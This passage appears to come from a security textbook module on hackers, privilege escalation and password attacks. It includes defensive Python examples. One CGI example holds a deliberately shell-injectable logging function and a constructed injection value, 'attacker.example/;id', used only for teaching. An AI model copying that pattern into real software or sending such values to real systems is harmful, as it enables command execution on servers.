industrial espionage: The collection and analysis of information about an organization's business competitors, often through illegal or unethical means, to gain an unfair competitive advantage; also known as corporate spying.

For more information about industrial espionage in the United States, visit the National Counterintelligence and
i Security Center at www.dni.gov/index.php/ncsc-home. Look through the resources for additional information on
top issues like economic espionage, cyber threats, and insider threats.

Some forms of espionage are relatively low-tech. One example, called shoulder surfing, is pictured in Figure 2-5. This technique is used in public or semipublic settings when people gather information they are not authorized to have. Instances of shoulder surfing occur at computer terminals, desks, and ATMs; on a bus, airplane, or subway, where people use smartphones and tablets; and in other places where employees may access confidential information. Shoulder surfing flies in the face of the unwritten etiquette among professionals who address information security in the workplace: If you can see another person entering personal or private information into a system, look away as the information is entered. Failure to do so constitutes not only a breach of etiquette but an affront to privacy and a threat to the security of confidential information.

To avoid shoulder surfing, try not to access confidential information when another person is present. People should limit the number of times they access confidential data, and should do it only when they are sure nobody can observe them. Users should be constantly aware of the presence of others when accessing sensitive information.

Figure 2-5 Shoulder surfing

shoulder surfing: The direct, covert observation of individual information or system use.
trespass: Unauthorized entry into the real or virtual property of another party.

Hackers

Acts of trespass can lead to unauthorized real or virtual actions that enable information gatherers to enter premises or systems without permission. Controls sometimes mark the boundaries of an organization's virtual territory. These boundaries give notice to trespassers that they are encroaching on the organization's cyberspace. Sound principles of authentication and authorization can help organizations protect valuable information and systems. These control methods and technologies employ multiple layers or factors to protect against unauthorized access and trespass.

The classic perpetrator of espionage or trespass is the hacker, who is frequently glamorized in fictional accounts as a person who stealthily manipulates a maze of computer networks, systems, and data to find information that solves the mystery and heroically saves the day. However, the true life of the hacker is far more mundane. The profile of the typical hacker has shifted from that of a 13- to 18-year-old male with limited parental supervision who spends all of his free time on the computer; by comparison, modern hackers have fewer known attributes (see Figure 2-6). In the real world, a hacker frequently spends long hours examining the types and structures of targeted systems and uses skill, guile, or fraud to attempt to bypass controls placed on information owned by someone else.

Hackers possess a wide range of skill levels, as with most technology users. However, most hackers are grouped into two general categories: the expert hacker and the novice hacker. The expert hacker is usually a master of several programming languages, networking protocols, and operating systems, and exhibits a mastery of the technical environment of the chosen targeted system. As described in the nearby feature "Hack PCWeek," expert hackers are extremely talented and usually devote extensive time and energy attempting to break into other people's information systems. Even though this example occurred several years ago, it illustrates that systems and networks are still attacked and compromised using the same techniques.

hacker: A person who accesses systems and information without authorization and often illegally.
expert hacker: A hacker who uses extensive knowledge of the inner workings of computer hardware and software to gain unauthorized access to systems and information, and who often creates automated exploits, scripts, and tools used by other hackers; also known as an elite hacker.
novice hacker: A relatively unskilled hacker who uses the work of expert hackers to perform attacks; also known as a neophyte, n00b, newbie, script kiddie, or packet monkey.

[Figure 2-6 is a mock wanted poster headed "IMA HACKER" (no photograph available; aliases "Lost," "All your PC are belong to me," "Cyber-Merlin"), wanted for breaking into computer systems, theft of confidential information, disclosure of stolen confidential information, hijacking victims' e-mail accounts, and defacing Internet websites. Every descriptor on the poster (dates of birth used, place of birth, height, weight, hair, eyes, sex, race, nationality, occupation, scars and marks) is listed as unknown. Remarks: individual may be age 12 to 60, male or female, of unknown background, with varying technological skill levels; may be internal or external to the organization.]

Figure 2-6 Contemporary hacker profile

In 2017, the Singapore Ministry of Defense invited hackers to test its publicly accessible systems for vulnerabilities. In March 2016, General Motors (GM) invited computer researchers to look for vulnerabilities in the software used in its vehicles and Web site, offering a reward to anyone who found an undocumented issue. In April 2016, the U.S. Department of Defense did the same thing, inviting hackers to "Hack the Pentagon," of all places, a program that continues to this day. This type of "bug bounty" program is an effort to convince both ethical and unethical hackers to help rather than hinder organizations in their security efforts. Other companies that recently invited such attacks include Tesla Motors, Inc., the ride-share company Uber, and Google.

Once an expert hacker chooses a target system, the likelihood is high that he or she will successfully enter the system. Fortunately for the many poorly protected organizations in the world, there are substantially fewer expert hackers than novice hackers.

A new category of hacker has emerged over the last few years. The professional hacker seeks to conduct attacks for personal benefit or the benefit of an employer, which is typically a crime organization or illegal government operation (see the section on cyberterrorism). The professional hacker should not be confused with the penetration tester (or pen tester), who has authorization from an organization to test its information systems and network defense and is expected to provide detailed reports of the findings. In practice that authorization takes the form of a written scope and rules of engagement agreed before any testing begins. The primary differences between professional hackers and penetration testers are the authorization provided and the ethical professionalism displayed.

professional hacker: A hacker who conducts attacks for personal financial benefit or for a crime organization or foreign government; not to be confused with a penetration tester.
penetration tester: An information security professional with authorization to attempt to gain system access in an effort to identify and recommend resolutions for vulnerabilities in those systems; also known as a pen tester.
pen tester: See penetration tester.

For more information about hacking, see the master’s thesis of Steven Kleinknecht, “Hacking Hackers: Ethno-
i graphic Insights into the Hacker Subculture—Definition, Ideology and Argot,” which you can find online either by
searching on the title or by going to https://macsphere.mcmaster.ca/handle/11375/10956.

Expert hackers often become dissatisfied with attacking systems directly and turn their attention to writing software. These programs are automated exploits that allow novice hackers to act as script kiddies or packet monkeys. The good news is that if an expert hacker can post a script tool where a script kiddie or packet monkey can find it, then systems and security administrators can find it, too. The developers of protection software and hardware and the service providers who keep defensive systems up to date also stay informed about the latest in exploit scripts. As a result of preparation and continued vigilance, attacks conducted by scripts are usually predictable and can be adequately defended against, provided the organization actually applies the patches and detection updates those scripts are written to exploit.

script kiddies: Novice hackers who use expertly written software to attack a system; also known as skids, skiddies, or script bunnies.
packet monkey: A novice hacker who uses automated exploits to engage in denial-of-service attacks.

Hack PCWeek
On September 20, 1999, PCWeek did the unthinkable: It set up two computers, one Linux-based, one Windows NT-based, and
challenged members of the hacking community to be the first to crack either system, deface the posted Web page, and claim a
$1,000 reward. Four days later, the Linux-based computer was hacked. Figure 2-7 shows the configuration of www.hackpcweek.com,
which is no longer functional. This feature provides the technical details of how the hack was accomplished not by a compromise
of the root operating system, but by the exploitation of an add-on CGI script with improper security checks.
In just under 20 hours, the hacker, known as JFS and hailing from Gibraltar (a.k.a. the Rock), used his advanced knowl-
edge of the Common Gateway Interface protocol (CGI) to gain control over the target server. He began as most attackers
do, with a standard port scan, finding only the HTTP port 80 open. A more detailed analysis of the Web servers revealed no
additional information.

Port scanning reveals TCP-based servers, such as telnet, FTP, DNS, and Apache, any of which are potential
access points for an attacker, wrote Pankaj Chowdhry in PCWeek. Further testing revealed that most of the
potentially interesting services refused connections, with JFS speculating that TCP Wrappers was used to
provide access control. The Web server port, 80/TCP, had to be open for Web access to succeed. JFS next used
a simple trick. If you send GET X HTTP/1.0 to a Web server, it will send back an error message (unless there
is a file named X) along with the standard Web server header. The header contains interesting facts, such
as the type and version of the Web server, and sometimes the host operating system and architecture.… As
the header information is part of the Web server standard, you can get this from just about any Web server,
including IIS.13

JFS then methodically mapped out the target, starting with the directory server, using the publicly offered WWW pages.
He identified commercial applications and scripts. Because he had learned nothing useful with the networking protocol
analyses, he focused on vulnerabilities in the dominant commercial application served on the system, PhotoAds. He was
able to access the source code, as it was offered with the product’s sale. With this knowledge, JFS was able to find, identify,
and look at the environment configuration script, but little else.
JFS then started his effort to exploit known server-side vulnerabilities such as the use of server-side includes and mod_perl embedded commands. When that did not pan out with his first attempt, he kept on, trying the process with every field, only to find that a Perl regular expression was in place to filter out most input before it was processed. JFS was able to locate just one user-assigned variable that wasn't being screened properly for malformed content. This single flaw encouraged him to keep up his effort.

JFS had located an environment variable, HTTP_REFERER (the browser-supplied Referer header as the CGI interface exposes it to the script), that was left unprotected. He first tried to use it with a server-side include or mod_perl embedded command to launch some code of his choosing. However, these services were not configured on the machine.

JFS continued to poke and prod through the system configuration, looking specifically for vulnerabilities in the PhotoAds CGI scripts. He then turned his attention to looking at open() and system() calls. Dead end.

JFS tried POST requests, but the Web server stripped out one of the necessary components of the hack string, the % sign, making the code fail to function. He then tried uploading files, but the file name variable was again being filtered by a regular expression, and uploaded files were just placed into a different directory and renamed anyway. He eventually gave up trying to get around the rename function.

[Figure 2-7 Hack PCWeek topology: traffic from the Internet passes through a Raptor firewall performing network address translation and then a bridge to reach the hackpcweek.com Web server; behind a second bridge sit a Linux server and a Windows NT 4.0 server, each running DB2, together with a discussion group server; intrusion detection systems monitor the network.]

The topology of the honeynet used for this exercise was designed to be similar to that which an administrator might put into a real production site. It was built without esoteric defenses, sticking to standard firewall and network approaches.

Figure 2-7 Hack PCWeek topology

After extensive work to create a C-based executable and smuggle it into the server, constantly battling to keep the file within the 8,190-byte limit the server imposed on a GET request, JFS hit another dead end and turned his attention to gaining root access.
“Using the bugtraq service, he found a cron exploit for which patches hadn’t been applied,” Chowdhry wrote. “He modi-
fied the hack to get a suidroot. This got him root access—and the ability to change the home page to the chilling: ‘This site
has been hacked. JFS was here.’”14
Game over.

i To learn more about one of the historically leading vulnerability sharing Web sites, you can examine Bugtraq at www.securityfocus.com, which for more than two decades provided information on many of the latest security vulnerabilities. The Bugtraq mailing list stopped carrying new posts in early 2021, but its archives remain a widely cited historical reference.
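The lesson of the PhotoAds flaw is that every value the CGI layer hands a script, including environment variables such as HTTP_REFERER that the browser controls, has to pass the same screening as a form field, and none of it should be handed to a shell. The following is an added illustration in Python, not the PhotoAds code or anything from the PCWeek write-up: a hypothetical referer-logging routine in its weak form (header pasted into a shell command line) next to a hardened form (allowlist validation of form fields and header variables alike, with the command built as an argument list). The field names, log path, logger command and patterns are assumptions for the example.

```python
"""Screening CGI inputs, including attacker-controlled environment variables.
Added example (not PhotoAds or PCWeek code); field names and patterns are assumed."""
import re

# Allowlists: one pattern per input the script accepts; anything else is rejected.
# The referer pattern admits only URL characters; ; | ` $ ( ) < > and whitespace
# never match, and '&' (needed in query strings) is harmless because no shell
# ever parses the value in the hardened path below.
FIELD_RULES = {
    "ad_id": re.compile(r"^[0-9]{1,10}$"),
    "email": re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,255}$"),
}
HEADER_RULES = {
    "HTTP_REFERER": re.compile(
        r"^https?://[A-Za-z0-9.-]{1,253}(?::[0-9]{1,5})?(?:/[A-Za-z0-9._~/?=&-]*)?$"),
}

def build_log_command_vulnerable(environ):
    """The weak pattern: an unscreened header is interpolated into a shell command line."""
    referer = environ.get("HTTP_REFERER", "-")
    return f"echo {referer} >> /var/log/photoads/referers.log"   # hypothetical path

def screen_inputs(form, environ):
    """Validate every form field and every header-derived variable the script uses.
    Returns (True, cleaned_dict) or (False, reason). Unknown form fields are rejected."""
    cleaned = {}
    for name, value in form.items():
        rule = FIELD_RULES.get(name)
        if rule is None:
            return False, f"unexpected field {name!r}"
        if not rule.fullmatch(value):
            return False, f"field {name!r} failed validation"
        cleaned[name] = value
    for name, rule in HEADER_RULES.items():
        value = environ.get(name, "")
        if value and not rule.fullmatch(value):
            return False, f"header variable {name} failed validation"
        cleaned[name] = value or "-"
    return True, cleaned

def build_log_command_hardened(form, environ):
    """Screen first, then build an argv list: nothing parses it as shell syntax."""
    ok, result = screen_inputs(form, environ)
    if not ok:
        raise ValueError(result)
    # 'logger' is a stand-in; run it with subprocess.run(argv), never with shell=True.
    return ["logger", "-t", "photoads", f"referer={result['HTTP_REFERER']}"]

def has_shell_metachar(s):
    """True if a string contains characters /bin/sh would treat specially."""
    return any(c in s for c in ";|&`$()<>\n")

if __name__ == "__main__":
    hostile = {"HTTP_REFERER": "http://attacker.example/;id"}      # constructed sample
    print(build_log_command_vulnerable(hostile))   # ';id' would execute under /bin/sh
    print(screen_inputs({"ad_id": "42"}, hostile)) # rejected before any command is built
    print(build_log_command_hardened({"ad_id": "42"},
                                     {"HTTP_REFERER": "https://www.example.com/ads?id=42"}))
```

The point of the argv form is that even a value the allowlist lets through (a query string containing '&', say) reaches the child process as a single argument; the allowlist is defense in depth, not the only barrier.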

There are a few well-documented cases of unskilled hackers getting caught. In February 2000, Michael Calce,
a.k.a. Mafiaboy, a 15-year-old Canadian, was responsible for a series of widely publicized denial-of-service attacks on
prominent Web sites. He pleaded guilty to 56 counts of computer mischief and was sentenced to eight months of open
custody (house arrest), to one year of probation with restricted Internet access, and to pay $250 to charity. His down-
fall came from his inability to delete the system logs that tracked his activity and his need to brag about his exploits
in chat rooms.15

In 2005, Jeanson James Ancheta used a large-scale botnet to compromise more than 400,000 systems that he then
rented to advertising companies. When he was caught and convicted, he was sentenced to 57 months in prison.16
In 2008, Albert Gonzalez, a.k.a. Soupnazi, a member of the Shadowcrew.com carding forum, was arrested for hacking into retailer and payment-processor networks and stealing credit card data and other personal data from millions of accounts; he was convicted and in 2010 sentenced to 20 years in prison.17
The most notorious hacker in recent times is Kevin Mitnick, whose history is highlighted in the nearby feature.
While Mitnick was considered an expert hacker by most, he often used social engineering rather than technical skills
to collect information for his attacks.

i For more information on Kevin Mitnick and his “pro-security” consulting practice, visit http://mitnicksecurity.com/.

Notorious Outlaws: Mitnick and Snowden


Among the most notorious hackers to date is Kevin Mitnick. The son of divorced parents, Mitnick grew up in an unremarkable middle-class environment. He got his start as a phreaker, later expanding his malicious activities to target computer companies. After physically breaking into the Pacific Bell Computer Center for Mainframe Operations, he was arrested. Mitnick, then 17, was convicted of destruction of data and theft of equipment and sentenced to three months in juvenile detention and a year's probation. He was arrested again in 1983 at the University of Southern California, where he was caught breaking into Pentagon computers. His next hacking battle pitted him against the FBI, where his unusual defense of computer addiction resulted in a one-year prison sentence and six months of counseling. In 1992, an FBI search of his residence resulted in charges of illegally accessing a phone company's computer, but this time Mitnick disappeared before his trial. In 1995, he was finally tracked down and arrested. Because he was a known flight risk, he was held without bail for nearly five years, eight months of it in solitary confinement. Afraid he would never get to trial, he eventually pleaded guilty to wire fraud, computer fraud, and intercepting communications. He was required to get permission to travel or use any technology until January 2003. He spent the rest of his career on the lecture circuit and in security consulting, speaking out in support of information security and against hacking, until his death in July 2023.18
Another notorious case involved Edward Snowden and the leak of a significantly large trove of classified intelligence. In
2009, Snowden began working as a contractor for Dell in service to a contract with the National Security Agency. In April 2012,
Snowden began collecting classified documents that described the U.S. government’s activities in amassing intelligence that
purportedly included proscribed surveillance of the domestic activities of U.S. citizens. After consulting with several journal-
ists in early 2013, he changed employers, working at the NSA as a contractor for Booz Allen Hamilton. He began sending
copies of NSA documents and other documents to the journalists he had met. In June 2013, Snowden was fired by Booz
Allen Hamilton and fled from Hawaii to Hong Kong, and the government charges against him began to mount. The public
debate about Snowden and NSA wiretap and surveillance activities continues—some perceive Snowden as a traitor, releasing
critical national intelligence to the nation’s adversaries, while others view him as a patriot, pursuing an ideal in uncovering
unconstitutional government misadventure.19

Escalation of Privileges

Once an attacker gains access to a system, the next step is to increase his or her privileges (privilege escalation). While most accounts associated with a system have only rudimentary "use" permissions and capabilities, the attacker needs administrative (a.k.a. admin) or "root" privileges. These privileges allow attackers to access information, modify the system itself to view all information in it, and hide their activities by modifying system logs. The escalation of privileges is a skill set in and of itself. However, just as novice hackers can use tools to gain access, they can use tools to escalate privileges.

One aggravating circumstance occurs when legitimate users accumulate unneeded privileges as they go about their assignments, having new privileges added for work tasks while keeping privileges they no longer need. Even over a short time, users can collect many unneeded privileges that an attacker could exploit if a user's credentials were compromised. Many organizations periodically review privileges and remove those that are no longer needed.

privilege escalation: The unauthorized modification of an authorized or unauthorized system user account to gain advanced access and control over system resources.
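The periodic privilege review mentioned above can be driven from an entitlement export rather than done by hand. The following is an added example in Python, not textbook code or any product's feature: it takes constructed grant records (user, privilege, when granted, when last exercised) and flags privileges idle beyond a threshold, treating never-used grants separately so that a brand-new grant is not flagged before the user has had a chance to use it, and it lists what an attacker would inherit by compromising one account. The user names, privilege names, dates and thresholds are all assumptions.

```python
"""Stale-privilege review over an entitlement export.
Added example, not textbook code; data, names and thresholds are constructed."""
from dataclasses import dataclass
from datetime import date
from typing import Optional

@dataclass(frozen=True)
class Grant:
    user: str
    privilege: str
    granted_on: date
    last_used: Optional[date]      # None: never exercised since it was granted

# Privileges whose misuse gives an attacker the most leverage; reviewed first.
HIGH_RISK = {"db.root", "erp.admin", "backup.restore"}

# Constructed sample export (a real one would come from an IAM system or OS audit data).
SAMPLE_GRANTS = [
    Grant("gwilliams", "erp.admin",      date(2023, 1, 10), date(2024, 3, 1)),
    Grant("gwilliams", "payroll.export", date(2022, 6, 1),  date(2023, 4, 15)),
    Grant("dbrown",    "db.root",        date(2023, 12, 1), None),
    Grant("dbrown",    "vpn.user",       date(2023, 9, 1),  date(2024, 3, 4)),
    Grant("tbaker",    "backup.restore", date(2024, 3, 1),  None),
]
AS_OF = date(2024, 3, 5)   # review date for the sample

def stale_grants(grants, as_of, unused_days=90, grace_days=30):
    """Return (grant, reason) pairs for privileges that look accumulated and unneeded.
    A never-used grant is flagged only after grace_days; a used one after unused_days idle."""
    findings = []
    for g in grants:
        if g.last_used is None:
            idle = (as_of - g.granted_on).days
            if idle > grace_days:
                findings.append((g, f"never used in the {idle} days since it was granted"))
        else:
            idle = (as_of - g.last_used).days
            if idle > unused_days:
                findings.append((g, f"last used {idle} days ago"))
    # High-risk privileges first, then by user, so the review starts where it matters.
    findings.sort(key=lambda f: (f[0].privilege not in HIGH_RISK, f[0].user))
    return findings

def exposure_if_compromised(grants, user):
    """Everything an attacker inherits by stealing one user's credentials."""
    return sorted(g.privilege for g in grants if g.user == user)

def run_review():
    """Run the review over the constructed sample at the sample review date."""
    return stale_grants(SAMPLE_GRANTS, AS_OF)

if __name__ == "__main__":
    for g, why in run_review():
        tag = "HIGH" if g.privilege in HIGH_RISK else "low "
        print(f"[{tag}] revoke {g.privilege:15} from {g.user:10} ({why})")
    print("gwilliams exposure:", exposure_if_compromised(SAMPLE_GRANTS, "gwilliams"))
```

With the sample data the review flags dbrown's never-used db.root grant and gwilliams's year-old payroll.export grant, while tbaker's four-day-old backup.restore grant stays inside the grace period.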
A common example of privilege escalation is called jailbreaking or rooting. Owners of certain smartphones can download and use a set of specialized tools to gain control over system functions, often against the original intentions of the designers. The term jailbreaking is more commonly associated with Apple's iOS devices, while the term rooting is more common with Android-based devices. Apple's tight controls over its iOS operating system prohibited other developers from creating applications for iOS devices. In 2010, the U.S. Copyright Office issued a statement specifying that jailbreaking a smartphone was legal as a special exemption under the Digital Millennium Copyright Act, but the exemption did not cover tablets such as the iPad; tablets were added in a later triennial rulemaking.20 Apple continues to insist that jailbreaking its devices violates the warranty and thus should not be attempted.

jailbreaking: Escalating privileges to gain administrator-level or root access control over a smartphone operating system; typically associated with Apple iOS smartphones. See also rooting.
rooting: Escalating privileges to gain administrator-level control over a computer system (including smartphones); typically associated with Android OS smartphones. See also jailbreaking.

Hacker Variants

Other terms for system rule breakers may be less familiar. The term cracker is now commonly associated with bypassing software copyright protection and with recovering passwords from stolen password hashes. With the removal of the copyright protection, software can be easily distributed and installed. With the cracking of password hashes copied from stolen system files, user accounts can be illegally accessed. In current usage, the terms hacker and cracker both denote criminal intent.

Phreakers grew in fame in the 1970s when they developed devices called blue boxes that reproduced the telephone network's in-band signaling tones, enabling them to make free long-distance calls. Later, red boxes were developed to simulate the tones of coins falling in a pay phone, and finally black boxes emulated the line voltage. With the advent of digital, out-of-band signaling, these boxes became practically obsolete. Even with the loss of the colored box technologies, however, phreakers continue to cause problems for all telephone systems.

In addition to the "Hack PCWeek" competition described earlier in this module, numerous other "hacker challenges" are designed to provide targets to people who want to test their hacking abilities. For example, www.hackthissite.org promotes a "free, safe, and legal training ground for hackers to test and expand their hacking skills."21 It is interesting that a site designed to support hacking requires user registration and compliance with a legal disclaimer.

cracker: A hacker who intentionally removes or bypasses software copyright protection designed to prevent unauthorized duplication or use.
phreakers: A hacker who manipulates the public telephone system to make free calls or disrupt services.
Password Attacks

Password attacks fall under the category of espionage or trespass just as lock picking falls under breaking and entering. Attempting to guess or reverse-calculate a password is often called cracking. There are several alternative approaches to password cracking:

Brute force
Dictionary
Rainbow tables
Social engineering

The application of computing and network resources to try every possible password combination is called a brute force password attack. If attackers can narrow the field of target accounts, they can devote more time and resources to these accounts. This is one reason to always change the password of the manufacturer's default administrator account.

Brute force password attacks are rarely successful against systems that have adopted the manufacturer's recommended security practices. Controls that limit the number of unsuccessful access attempts within a certain time are very effective against online brute force attacks, where every guess has to be submitted to the live system; they do nothing against offline attacks, where the attacker has already stolen the password hashes and tests guesses on hardware he or she controls. As shown in Table 2-6, the strength of a password determines its ability to withstand a brute force attack. Using best practice policies like the 10.4 password rule and systems that allow case-sensitive passwords can greatly enhance their strength. Note that current NIST guidance (SP 800-63B) favors length and screening against lists of known-breached passwords over mandatory composition rules, since each additional character multiplies the search space while a required symbol only adds to the character set.

cracking: Attempting to reverse-engineer, remove, or bypass a password or other access control protection, such as the copyright protection on software (see cracker).
brute force password attack: An attempt to guess a password by attempting every possible combination of characters and numbers in it.
10.4 password rule: An industry recommendation for password structure and strength that specifies passwords should be at least 10 characters long and contain at least one of the following four elements: an uppercase letter, one lowercase letter, one number, and one special character.
46 Principles of Information Security

Table 2-6 Password Strength

Case-insensitive Passwords Using a Standard Alphabet Set (No Numbers or Special Characters)

Password Length | Odds of Cracking: 1 in (based on number of characters ^ password length) | Estimated Time to Crack*
8  | 208,827,064,576                 | 0.36 seconds
9  | 5,429,503,678,976               | 9.27 seconds
10 | 141,167,095,653,376             | 4.02 minutes
11 | 3,670,344,486,987,780           | 1.74 hours
12 | 95,428,956,661,682,200          | 1.89 days
13 | 2,481,152,873,203,740,000       | 49.05 days
14 | 64,509,974,703,297,200,000      | 3.5 years
15 | 1,677,259,342,285,730,000,000   | 90.9 years
16 | 43,608,742,899,428,900,000,000  | 2,362.1 years

Case-sensitive Passwords Using a Standard Alphabet Set with Numbers and 20 Special Characters

Password Length | Odds of Cracking: 1 in (based on number of characters ^ password length) | Estimated Time to Crack*
8  | 2,044,140,858,654,980                         | 1.0 hours
9  | 167,619,550,409,708,000                       | 3.3 days
10 | 13,744,803,133,596,100,000                    | 271.7 days
11 | 1,127,073,856,954,880,000,000                 | 61.0 years
12 | 92,420,056,270,299,900,000,000                | 5,006.0 years
13 | 7,578,444,614,164,590,000,000,000             | 410,493.2 years
14 | 621,432,458,361,496,000,000,000,000           | 33,660,438.6 years
15 | 50,957,461,585,642,700,000,000,000,000        | 2,760,155,968.2 years
16 | 4,178,511,850,022,700,000,000,000,000,000     | 226,332,789,392.1 years

Note: Modern workstations are capable of using multiple CPUs, further decreasing time to crack, or simply splitting the
workload among multiple systems.
* Estimated Time to Crack is based on a 2020-era Intel i9-10900X 10 Core CPU performing 585 Dhrystone GFLOPS (giga/billion
floating point operations per second) at 5.2 GHz (overclocked).
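To make the table’s arithmetic concrete, the following added example (not from the textbook) computes the keyspace and exhaustive-search time for both halves of Table 2-6, checks a password against the 10.4 rule, and models the failed-attempt lockout control the text recommends against brute force. The guess rate of 585 billion per second is an assumption derived from the table’s own 26^8-in-0.36-seconds row.

```python
import string

# Guess rate implied by Table 2-6: 26^8 candidates exhausted in 0.36 seconds works
# out to about 5.85 x 10^11 guesses per second (assumption derived from the table).
GUESSES_PER_SECOND = 585e9

# Character-set sizes for the two halves of Table 2-6.
LOWER_ONLY = 26                            # case-insensitive standard alphabet
MIXED_WITH_SPECIALS = 26 + 26 + 10 + 20    # upper + lower + digits + 20 specials = 82


def keyspace(charset_size: int, length: int) -> int:
    """Distinct passwords of this length: the table's 'Odds of Cracking: 1 in' column."""
    return charset_size ** length


def exhaustive_search_seconds(charset_size: int, length: int,
                              rate: float = GUESSES_PER_SECOND) -> float:
    """Worst-case time to try every candidate at the given guess rate."""
    return keyspace(charset_size, length) / rate


def human_time(seconds: float) -> str:
    """Render seconds in the units the table uses (seconds, minutes, hours, days, years)."""
    for unit, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.2f} {unit}"
    return f"{seconds:.2f} seconds"


def meets_10_4_rule(password: str) -> bool:
    """10.4 rule: at least 10 characters and at least one uppercase letter, one
    lowercase letter, one digit and one special character."""
    specials = set(string.punctuation)
    return (len(password) >= 10
            and any(c.isupper() for c in password)
            and any(c.islower() for c in password)
            and any(c.isdigit() for c in password)
            and any(c in specials for c in password))


class LockoutPolicy:
    """Limit unsuccessful access attempts within a time window, the control the text
    recommends against online brute force. Timestamps are plain seconds passed in by
    the caller so the behaviour is deterministic."""

    def __init__(self, max_failures: int = 5, window_seconds: int = 900):
        self.max_failures = max_failures
        self.window = window_seconds
        self._failures = {}  # account -> timestamps of recent failed attempts

    def _recent(self, account: str, now: float) -> list:
        return [t for t in self._failures.get(account, []) if now - t < self.window]

    def record_failure(self, account: str, now: float) -> None:
        self._failures[account] = self._recent(account, now) + [now]

    def is_locked(self, account: str, now: float) -> bool:
        return len(self._recent(account, now)) >= self.max_failures


if __name__ == "__main__":
    for charset in (LOWER_ONLY, MIXED_WITH_SPECIALS):
        print(f"charset size {charset}:")
        for length in range(8, 17):
            secs = exhaustive_search_seconds(charset, length)
            print(f"  {length:>2}  {keyspace(charset, length):>40,}  {human_time(secs)}")
    print("10.4 rule:", meets_10_4_rule("Tr0ub4dor&3"), meets_10_4_rule("password123"))
```

The printed rows reproduce the table to rounding, which shows that the 26-character and 82-character columns differ by a factor of roughly 10,000 at length eight alone.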

The dictionary password attack, or simply dictionary attack, is a variation of the brute force attack that narrows
the field by using a dictionary of common passwords and includes information related to the target user, such as names
of relatives or pets, and familiar numbers such as phone numbers, addresses, and even Social Security numbers.
Organizations can use similar dictionaries to disallow passwords during the reset process and thus guard against
passwords that are easy to guess. In addition, rules requiring numbers and special characters in passwords make the
dictionary attack less effective.
A far more sophisticated and potentially much faster password attack is possible if the attacker can gain access to
an encrypted password file, such as the Security Account Manager (SAM) data file. While these password files contain
hashed representations of users’ passwords—not the actual passwords, and thus cannot be used by themselves—the hash
values for a wide variety of passwords can be looked up in a database known as a rainbow table. These plain text files
can be quickly searched, and a hash value and its corresponding plaintext value can be easily located. Module 10,
“Cryptography,” describes plaintext, ciphertext, and hash values in greater detail.

dictionary password attack
A variation of the brute force password attack that attempts to narrow the range of possible passwords guessed by using
a list of common passwords and possibly including attempts based on the target’s personal information.

rainbow table
A table of hash values and their corresponding plaintext values that can be used to look up password values if an
attacker is able to steal a system’s encrypted password file.
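The two defensive points in the passage above, as an added example that is not from the textbook: a precomputed hash-to-plaintext table recovers an unsalted password hash instantly but is useless against a per-user salted hash, and the organization-side dictionary (common passwords plus words tied to the user) rejects weak choices at reset time. The password list and user details are constructed sample data.

```python
import hashlib
import os

# Constructed sample data, not from the textbook: a tiny stand-in for a cracking
# dictionary of common passwords.
COMMON_PASSWORDS = ["password", "123456", "qwerty", "letmein", "Fluffy2019"]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_lookup_table(candidates) -> dict:
    """Precompute hash -> plaintext for every candidate. A real rainbow table stores
    chains instead of every pair, but the property that matters to a defender is the
    same: the work is done once, before any password file is stolen."""
    return {sha256_hex(p.encode()): p for p in candidates}


def hash_unsalted(password: str) -> str:
    """How a password file looks when the same password always hashes the same way."""
    return sha256_hex(password.encode())


def hash_salted(password: str, salt: bytes = None) -> str:
    """Per-user random salt stored beside the digest as 'salthex$digest'. Because the
    salt enters the hash, a table precomputed over bare passwords no longer applies.
    (SHA-256 keeps the example short; production systems use a deliberately slow
    password hash such as PBKDF2, bcrypt or Argon2 on top of salting.)"""
    salt = os.urandom(16) if salt is None else salt
    return salt.hex() + "$" + sha256_hex(salt + password.encode())


def verify_salted(stored: str, password: str) -> bool:
    salt_hex, digest = stored.split("$", 1)
    return sha256_hex(bytes.fromhex(salt_hex) + password.encode()) == digest


def lookup(table: dict, digest: str):
    """Recover the plaintext if the stolen digest appears in the precomputed table."""
    return table.get(digest)


def build_personal_dictionary(user_info: dict) -> set:
    """The organization-side use the text describes: common passwords plus words tied
    to the user (pet, relative, phone number) with typical suffixes, used to reject
    weak choices during a password reset."""
    words = set(COMMON_PASSWORDS)
    for value in user_info.values():
        base = str(value)
        for variant in (base.lower(), base.capitalize()):
            words.add(variant)
            for suffix in ("1", "123", "!", "2019", "2020"):
                words.add(variant + suffix)
    return words


def is_reset_allowed(new_password: str, dictionary: set) -> bool:
    return new_password not in dictionary
```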

Did you know that a space can change how a word is used? For example, “plaintext” is a special term from the field of
cryptography that refers to textual information a cryptosystem will transmit securely as ciphertext. It is plaintext
before it is encrypted, and it is plaintext after it is decrypted, but it is ciphertext in between. However, the
phrase “plain text” is a term from the field of information systems that differentiates the text characters you type
from the formatted text you see in a document. For more information about cryptosystems and cryptography, see Module 10.

Social Engineering Password Attacks


While social engineering is discussed in detail later in the section called “Human Error or Failure,” it is worth men-
tioning here as a mechanism to gain password information. Attackers posing as an organization’s IT professionals
may attempt to gain access to systems information by contacting low-level employees and offering to help with their
computer issues. After all, what employee doesn’t have issues with computers? By posing as a friendly help-desk or
repair technician, the attacker asks employees for their usernames and passwords, and then uses the information to
gain access to organizational systems. Some even go so far as to resolve the user’s issues. Social engineering is much
easier than hacking servers for password files.

Forces of Nature
Forces of nature, sometimes called acts of God, can present some of the most dangerous threats because they usu-
ally occur with little warning and are beyond the control of people. These threats, which include events such as fires,
floods, earthquakes, landslides, mudslides, windstorms, sandstorms, solar flares, and lightning as well as volcanic
eruptions and insect infestations, can disrupt not only people’s lives but the storage, transmission, and use of infor-
mation. Severe weather was suspected in three 2008 outages in the Mediterranean that affected Internet access to
the Middle East and India.
Natural disasters also include pandemics, such as the 2020 COVID-19 outbreak. At the time of this writing, the
pandemic was still under way, and many small businesses were shut down, some never to reopen. The majority of the
world’s infrastructure continues to function, but if the virus had been more deadly, its global impact could have been
even more disastrous. Knowing a region’s susceptibility to certain natural disasters is a critical planning component
when selecting new facilities for an organization or considering the location of off-site data backup.
Because it is not possible to avoid threats from forces of nature, organizations must implement controls to limit
damage and prepare contingency plans for continued operations, such as disaster recovery plans, business continuity
plans, and incident response plans. These threats and plans are discussed in detail in Module 5, “Contingency Planning
and Incident Response.”
Another term you may encounter, force majeure, can be translated as “superior force,” which includes forces of
